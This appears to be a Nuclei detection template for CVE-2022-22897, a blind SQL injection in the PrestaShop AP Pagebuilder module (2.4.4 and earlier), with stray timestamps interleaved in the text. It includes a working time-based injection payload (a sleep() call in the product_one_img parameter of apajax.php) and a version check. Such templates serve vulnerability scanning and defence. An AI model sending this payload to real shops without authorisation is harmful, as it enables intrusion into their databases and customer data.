2023-07-13 16:54:13 +00:00
id : CVE-2022-22897
info :
name : PrestaShop Ap Pagebuilder <= 2.4.4 SQL Injection
author : mastercho
severity : Critical
description : |
The AP PAGEBUILDER Prestashop module <= 2.4.4 is vulnerable to Blind SQL Injection. An attacker can exploit this vulnerability to execute arbitrary SQL queries on the underlying database.
reference :
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22897
- https://packetstormsecurity.com/files/cve/CVE-2022-22897
- https://www.openservis.cz/prestashop-blog/nejcastejsi-utoky-v-roce-2023-seznam-deravych-modulu-nemate-nejaky-z-nich-na-e-shopu-i-vy/
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2022-22897
cwe-id : CWE-89
tags : cve,cve2022,prestashop,prestashop-module,sqli
metadata :
max-request : 1
http :
- raw :
- |
@timeout : 12s
POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
Referer : {{BaseURL}}
X-Requested-With : XMLHttpRequest
Connection : Keep-alive
2023-07-13 17:04:28 +00:00
2023-07-13 16:54:13 +00:00
leoajax=1&product_one_img=if(now()=sysdate()%2Csleep(6)%2C0)
- |
GET /modules/appagebuilder/config.xml HTTP/1.1
Host : {{Hostname}}
extractors :
- type : regex
name : version
part : body_1
internal : true
group : 1
regex :
- "<version>\\s*<!\\[CDATA\\[(.*?)\\]\\]>\\s*<\\/version>"
stop-at-first-match : true
matchers-condition : or
matchers :
- type : dsl
dsl :
- 'duration_1>=6'
- 'status_code_2 == 200 && compare_versions(version, "<= 2.4.4")'
condition : or